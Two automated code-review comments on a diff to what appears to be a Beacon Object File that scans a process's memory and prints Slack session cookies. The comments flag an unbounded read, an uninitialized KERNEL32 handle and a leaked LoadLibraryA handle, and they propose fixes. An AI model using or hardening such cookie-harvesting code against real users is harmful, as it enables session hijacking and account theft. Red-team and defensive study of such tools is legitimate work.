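Review bot: The new strnlen bound only limits how far `index` advances; the `BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index)` on the line above it still reads until a NUL, and whether the `+0x100` slack that intAlloc adds to the allocation is zeroed is not visible here (intAlloc lives in base.c). Computing the length once and printing with it, `BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %.*s", (int)len, buffer + index);` with `size_t len = MSVCRT$strnlen((char *)(buffer + index), remainingSize);`, keeps the read inside the buffer regardless — assuming Beacon's formatter accepts `%.*s`, which should be confirmed. `remainingSize` is also recomputed on every iteration although only the match branch uses it; declaring it inside the `if` would make that clear. Write_Memory_Range begins above this hunk.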
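Review bot: `if (KERNEL32)` at `END:` reads `KERNEL32` uninitialized when the label is reached from the `hProcess == 0` check, because that `goto END` sits above the `HMODULE KERNEL32 = LoadLibraryA("kernel32");` declaration in the unchanged part of GetProcessMemory; jumping past an initialized declaration leaves the object indeterminate, so FreeLibrary may be called on garbage. Declare it at the top of the function as `HMODULE KERNEL32 = NULL;` and keep `KERNEL32 = LoadLibraryA("kernel32");` at its current position. Write_Memory_Range in the same file still never releases the handle from its own LoadLibraryA call, so the subject line's fix appears to be applied to only one of the two call sites. GetProcessMemory begins above this hunk.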